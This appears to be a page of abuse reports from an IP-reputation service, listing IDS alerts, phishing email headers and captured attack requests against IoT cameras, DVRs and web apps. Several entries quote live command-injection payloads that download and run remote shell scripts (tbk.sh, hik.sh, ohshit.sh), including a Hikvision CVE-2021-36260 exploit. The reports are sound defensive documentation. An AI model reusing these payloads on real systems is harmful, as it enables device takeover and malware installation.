POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget%20http%3A%2F%2F207.244.199.152 ...
show morePOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget%20http%3A%2F%2F207.244.199.152%2Ftbk.sh%20-O-%20%7C%20sh HTTP/1.1
Host: <redacted>
User-Agent: Mozila/5.0
show less
Malicious PUT request to /SDK/webLanguage attempting to mount remote NFS share and execute script (h ...
show moreMalicious PUT request to /SDK/webLanguage attempting to mount remote NFS share and execute script (hik.sh) using busybox. Payload includes command injection:
$(busybox mkdir f; busybox mount -o intr,nolock,tcp,exec 87.121.84.34:/srv/nfs/shared f; cd f; ./hik.sh)
Originating IP: 87.121.84.34
PUT /SDK/webLanguage HTTP/1.1
Host: <your server IP>
...
<?xml version="1.0" encoding="UTF-8"?>
<language>$(busybox mkdir f;busybox mount -o intr,nolock,tcp,exec 87.121.84.34:/srv/nfs/shared f;cd f;./hik.sh)</language>
show less
ET EXPLOIT Hikvision IP Camera RCE Attempt (CVE-2021-36260) [**] [Classification: Attempted Administ ...
show moreET EXPLOIT Hikvision IP Camera RCE Attempt (CVE-2021-36260) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 109.122.198.105:57062 -> x.x.x.x:443
show less
Type: Remote Code Execution (FreeMarker Template Injection)
Details:
Attacker tried to exploit /ca ...
show moreType: Remote Code Execution (FreeMarker Template Injection)
Details:
Attacker tried to exploit /catalog-portal/ui/oauth/verify by injecting a malicious FreeMarker expression in the deviceUdid parameter:
${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http://x.x.x.x/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh")}
Target host: x.x.x.x
Attacker User-Agent: Mozilla/5.0 ...
Download URL for script: http://x.x.x.x/ohshit.sh
Purpose is to gain code execution and possibly compromise the host.
show less
Type: Web Application Attack (RCE attempt)
Details:
Attempt to exploit a vulnerable endpoint (/SDK ...
show moreType: Web Application Attack (RCE attempt)
Details:
Attempt to exploit a vulnerable endpoint (/SDK/webLanguage) using an XML payload with embedded shell commands. Payload tries to mount an external NFS share from 87.121.84.34 and execute a suspicious binary (a5le0w hikvision). Also attempts cleanup using rm -rf to cover tracks. Full decoded payload available on request.
show less
ET WEB_SERVER Tilde in URI - potential .php~ source disclosure vulnerability [**] [Classification: W ...
show moreET WEB_SERVER Tilde in URI - potential .php~ source disclosure vulnerability [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 78.153.140.151:57426 -> x.x.x.x:443
show less
ET HUNTING Suspicious Chmod Usage in URI (Inbound) [**] [Classification: Attempted Administrator Pri ...
show moreET HUNTING Suspicious Chmod Usage in URI (Inbound) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 141.98.11.35:46970 -> x.x.x.x:443
ET WEB_SERVER /bin/bash In URI, Possible Shell Command Execution Attempt Within Web Exploit [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 141.98.11.35:46970 -> x.x.x.x:443
ET WEB_SERVER /bin/sh In URI Possible Shell Command Execution Attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 141.98.11.35:46970 -> x.x.x.x:443
ET EXPLOIT MVPower DVR Shell UCE [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 141.98.11.35:46970 -> x.x.x.x:443
show less
ET EXPLOIT Possible Qmail CVE-2014-6271 Mail From attempt [**] [Classification: Attempted Administra ...
show moreET EXPLOIT Possible Qmail CVE-2014-6271 Mail From attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 23.175.49.226:60726 -> x.x.x.x:25
show less
2 times a phishing message from:
Received: from hosts44.bricogifts.com (unknown [176.103.233.59])
...
show more2 times a phishing message from:
Received: from hosts44.bricogifts.com (unknown [176.103.233.59])
by xxxxxx.nl (Postfix) with ESMTP id ..........
for <[email protected]>; Thu, 7 Nov 2024 ..:..:.. +0100 (CET)
show less
email spoofing with phising content
Received: from 207-251-169-152.fibertel.com.ar ( [152.169.251 ...
show moreemail spoofing with phising content
Received: from 207-251-169-152.fibertel.com.ar ( [152.169.251.207])
by sfs1501.xxxxxx.nl (Symantec Mail Security) with SMTP id BD.66.29087.9053D176; Sat, 26 Oct 2024 20:29:30 +0200 (CEST)
show less
Received: from [196.120.185.56] (unknown [196.120.185.56])
by xxxxxx.nl (Postfix) with ESMTP id 31 ...
show moreReceived: from [196.120.185.56] (unknown [196.120.185.56])
by xxxxxx.nl (Postfix) with ESMTP id 312EC2B7D88
for <[email protected]>; Sat, 26 Oct 2024 21:52:02 +0200 (CEST)
From: <[email protected]>
show less
ET WEB_SERVER PHP.//Input in HTTP POST [**] [Classification: A Network Trojan was detected] [Priorit ...
show moreET WEB_SERVER PHP.//Input in HTTP POST [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.128.232.200:51102 -> x.x.x.x:443
show less